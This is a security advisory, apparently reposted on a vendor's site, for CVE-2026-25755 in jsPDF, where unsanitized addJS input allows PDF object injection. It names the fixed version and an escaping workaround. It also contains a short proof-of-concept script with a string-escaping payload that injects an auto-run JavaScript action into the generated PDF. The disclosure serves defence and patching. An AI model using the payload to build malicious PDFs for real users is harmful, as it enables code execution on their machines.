jsPDF has a PDF Object Injection via Unsanitized Input in addJS Method
GHSA-9vjf-qc39-jprp · CVE-2026-25755
Published · Modified
AI SAST
Find this class of vulnerability in your own code
Corgea's AI-native static analysis detects vulnerabilities like this one across your repositories, ranks them by exploitability, and returns review-ready fixes.
Description
Impact
User control of the argument of the addJS method allows an attacker to inject arbitrary PDF objects into the generated document. By crafting a payload that escapes the JavaScript string delimiter, an attacker can execute malicious actions or alter the document structure, impacting any user who opens the generated PDF.
import { jsPDF } from "jspdf";
const doc = new jsPDF();
// Payload:
// 1. ) closes the JS string.
// 2. > closes the current dictionary.
// 3. /AA ... injects an "Additional Action" that executes on focus/open.
const maliciousPayload = "console.log('test');) >> /AA << /O << /S /JavaScript /JS (app.alert('Hacked!')) >> >>";
doc.addJS(maliciousPayload);
doc.save("vulnerable.pdf");
Patches
The vulnerability has been fixed in jspdf@4.2.0.
Workarounds
Escape parentheses in user-provided JavaScript code before passing them to the addJS method.
References
https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md
References
- WEB https://github.com/parallax/jsPDF/security/advisories/GHSA-9vjf-qc39-jprp
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2026-25755
- WEB https://github.com/parallax/jsPDF/commit/56b46d45b052346f5995b005a34af5dcdddd5437
- WEB https://github.com/ZeroXJacks/CVEs/blob/main/2026/CVE-2026-25755.md
- PACKAGE https://github.com/parallax/jsPDF
- WEB https://github.com/parallax/jsPDF/releases/tag/v4.2.0
Ready to move
Start Securing
Free, no credit card | First findings in minutes